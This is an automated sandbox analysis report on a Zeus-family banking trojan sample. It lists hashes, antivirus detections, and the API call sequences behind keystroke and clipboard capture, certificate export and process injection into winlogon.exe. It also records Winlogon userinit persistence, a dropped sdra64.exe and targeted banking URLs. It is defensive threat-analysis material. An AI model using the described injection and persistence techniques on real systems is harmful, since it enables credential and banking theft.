Analysis Report glGb1KYfX6

Overview

General Information

Sample Name: glGb1KYfX6 (renamed file extension from none to exe)
Analysis ID: 368363
MD5: 8944bc22235936b73bdf874bfa4d1a64
SHA1: 6f48fb18ffd6497fbdc951b4d96340e878921d91
SHA256: d1bf7ec60bcb74dd395f92a1ddb5a2a66e9913514e0f7428681e9a8d7fe25b1e
Tags: zeus1

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Startup

  • System is w10x64
  • glGb1KYfX6.exe (PID: 4144 cmdline: 'C:\Users\user\Desktop\glGb1KYfX6.exe' MD5: 8944BC22235936B73BDF874BFA4D1A64)
    • winlogon.exe (PID: 560 cmdline: MD5: F9017F2DC455AD373DF036F5817A8870)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov, Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: 'C:\Users\user\Desktop\glGb1KYfX6.exe' , ParentImage: C:\Users\user\Desktop\glGb1KYfX6.exe, ParentProcessId: 4144, ProcessCommandLine: , ProcessId: 560

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: glGb1KYfX6.exe, Avira: detected
Antivirus detection for dropped file
Source: C:\Windows\SysWOW64\sdra64.exe, Avira: detection malicious, Label: TR/ATRAPS.Gen2
Multi AV Scanner detection for submitted file
Source: glGb1KYfX6.exe, Virustotal: Detection: 87%
Source: glGb1KYfX6.exe, ReversingLabs: Detection: 91%
Machine Learning detection for dropped file
Source: C:\Windows\SysWOW64\sdra64.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: glGb1KYfX6.exe, Joe Sandbox ML: detected
Source: 0.0.glGb1KYfX6.exe.400000.0.unpack, Avira: Label: TR/ATRAPS.Gen2
Source: 0.1.glGb1KYfX6.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen3
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_004101CA CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: glGb1KYfX6.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040B844 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00413853 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00413682 PathCombineW,FindFirstFileW,wnsprintfW,PathCombineW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_004048AC PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00407F27 ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040C598 SHGetSpecialFolderPathW,PathCombineW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,WideCharToMultiByte,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00411DB9 PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00407066 InternetReadFile
Source: winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmp, String found in binary or memory: https://bc.nsk.
Source: glGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmp, String found in binary or memory: https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source: glGb1KYfX6.exe, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmp, String found in binary or memory: https://www.faktura.ru/enter.jsp?site=
Source: glGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmp, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmp, String found in binary or memory: https://www.faktura.ru/enter.jsp?site=%S
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040652B GetClipboardData,GlobalFix,GlobalUnWire
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040668F GetTickCount,GetCurrentProcessId,wnsprintfW,GetKeyState,GetKeyState,GetKeyboardState,ToUnicode,WideCharToMultiByte
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040AE64 CreateFileW,NtQueryObject,lstrcpyW,CloseHandle
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00406266 NtQueryDirectoryFile,NtQueryObject,lstrcmpiW
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00405F35 NtCreateFile,PathRemoveFileSpecW,PathCombineW,CreateFileW,CloseHandle
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00407BE9 NtQueryInformationProcess,CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,NtCreateThread
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040B4C6 GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,GetForegroundWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateTokenEx,LoadLibraryA,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040B938 ExitWindowsEx
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, File created: C:\Windows\SysWOW64\sdra64.exe
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_004100D7
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_004103AE
Source: glGb1KYfX6.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sdra64.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal100.evad.winEXE@1/2@0/0
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_004045A1 CertOpenSystemStoreW,PFXExportCertStore,PFXExportCertStore,GetSystemTime,wnsprintfW,CertDuplicateCertificateContext,CertDeleteCRLFromStore,CertEnumCertificatesInStore,CertCloseStore
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00411622 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040B135 CreateToolhelp32Snapshot,GetUserNameW,lstrcpyW,SHGetSpecialFolderPathW,Process32FirstW,lstrcmpiW,OpenProcess,K32GetModuleFileNameExW,PathCombineW,lstrcmpiW,lstrcmpiW,CloseHandle,Process32NextW,CloseHandle,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Mutant created: \Sessions\1\BaseNamedObjects\_AVIRA_21099
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, File read: C:\Users\user\Desktop\glGb1KYfX6.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Unpacked PE file: 0.2.glGb1KYfX6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;.data1:W;
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040AB9A LoadLibraryA,GetProcAddress
Source: initial sample, Static PE information: section name: .text entropy: 6.93746073005
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, File created: C:\Windows\SysWOW64\sdra64.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00408DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadCursorW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Dropped PE file which has not been started: C:\Windows\SysWOW64\sdra64.exe
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, TID: 3892, Thread sleep count: 196 > 30
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_00405C1F LdrGetProcedureAddress
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Code function: 0_2_0040AC42 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW
Source: C:\Users\user\Desktop\glGb1KYfX6.exe, Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page read and writeJump to behavior
